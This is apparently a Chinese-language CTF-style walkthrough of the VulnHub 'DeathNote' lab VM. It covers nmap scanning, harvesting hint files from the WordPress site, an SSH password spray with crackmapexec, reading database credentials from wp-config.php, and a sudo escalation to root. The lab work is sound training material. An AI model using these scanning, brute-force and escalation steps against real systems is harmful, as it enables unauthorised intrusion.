打靶记录(一六七)之VulnHubDeathNote

端口扫描

┌──(mikannse㉿kali)-[~/vulnhub/deathnote]
└─$ sudo nmap --min-rate=10000 -p- 192.168.56.111
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-07 16:16 HKT
Nmap scan report for 192.168.56.111
Host is up (0.069s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:26:04:09 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 22.53 seconds

┌──(mikannse㉿kali)-[~/vulnhub/deathnote]
└─$ sudo nmap -sT -sC -sV -O -p22,80 192.168.56.111
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-07 16:18 HKT
Nmap scan report for 192.168.56.111
Host is up (0.00062s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 5e:b8:ff:2d:ac:c7:e9:3c:99:2f:3b:fc:da:5c:a3:53 (RSA)
|   256 a8:f3:81:9d:0a:dc:16:9a:49:ee:bc:24:e4:65:5c:a6 (ECDSA)
|_  256 4f:20:c3:2d:19:75:5b:e8:1f:32:01:75:c2:70:9a:7e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:26:04:09 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.22 seconds

┌──(mikannse㉿kali)-[~/vulnhub/deathnote]
└─$ sudo nmap --script=vuln -p22,80 192.168.56.111
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-07 16:19 HKT
Nmap scan report for 192.168.56.111
Host is up (0.00063s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|   /wordpress/: Blog
|   /robots.txt: Robots file
|   /wordpress/wp-login.php: Wordpress login page.
|_  /manual/: Potentially interesting folder
MAC Address: 08:00:27:26:04:09 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.26 seconds

Web

访问80端口，发现跳转到了wordpress,添加hosts

访问robots.txt,有一个/important.jpg

┌──(mikannse㉿kali)-[~/vulnhub/deathnote]
└─$ wget http://deathnote.vuln/important.jpg

┌──(mikannse㉿kali)-[~/vulnhub/deathnote]
└─$ cat important.jpg 
i am Soichiro Yagami, light's father
i have a doubt if L is true about the assumption that light is kira

i can only help you by giving something important

login username : user.txt
i don't know the password.
find it by yourself 
but i think it is in the hint section of site

在wordpress首页找到一个hint,所以还需要寻找notes.txt

发现wp-content/uploads/我们是可以直接访问的

下载notes.txt和user.txt

处理一下user.txt

┌──(mikannse㉿kali)-[~/vulnhub/deathnote]
└─$ awk '{print tolower($0)}' user.txt |sort |uniq >user1.txt

┌──(mikannse㉿kali)-[~/vulnhub/deathnote]
└─$ crackmapexec ssh 192.168.56.111 -u user1.txt -p notes.txt --continue-on-success
SSH         192.168.56.111  22     192.168.56.111   [*] SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2
SSH         192.168.56.111  22     192.168.56.111   [-] kira:death4 Authentication failed.
<SNIP>
SSH         192.168.56.111  22     192.168.56.111   [+] l:death4me 
SSH         192.168.56.111  22     192.168.56.111   [-] light:death4 Authentication failed.
SSH         192.168.56.111  22     192.168.56.111   [-] light:death4life Authentication failed.
SSH         192.168.56.111  22     192.168.56.111   [-] light:death4u Authentication failed.
SSH         192.168.56.111  22     192.168.56.111   [-] light:death4ever Authentication failed.
SSH         192.168.56.111  22     192.168.56.111   [-] light:death4all Authentication failed.
SSH         192.168.56.111  22     192.168.56.111   [-] light:death420 Authentication failed.

得到正确账密:l:death4me

正确密码放最后一个，太有实力了作者

提权

发现本地还开一个3306

l@deathnote:/home/kira$ ss -tlnp
State        Recv-Q       Send-Q             Local Address:Port              Peer Address:Port       
LISTEN       0            128                      0.0.0.0:22                     0.0.0.0:*          
LISTEN       0            80                     127.0.0.1:3306                   0.0.0.0:*          
LISTEN       0            128                         [::]:22                        [::]:*          
LISTEN       0            128                            *:80                           *:* 

查看wp-config.php能找到数据库凭证

define( 'DB_USER', 'l' );

/** MySQL database password */
define( 'DB_PASSWORD', 'death4me' );

但是连接查看后没有什么用

在/opt目录发现一个case.wav,但实际是一个文本，放在cyberchef中得到是kira用户的密码:kiraisevil

直接提权

kira@deathnote:~$ sudo -l
[sudo] password for kira: 
Matching Defaults entries for kira on deathnote:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kira may run the following commands on deathnote:
    (ALL : ALL) ALL
kira@deathnote:~$ sudo -i
root@deathnote:~# id
uid=0(root) gid=0(root) groups=0(root)

碎碎念

多少有点抽象了这个房间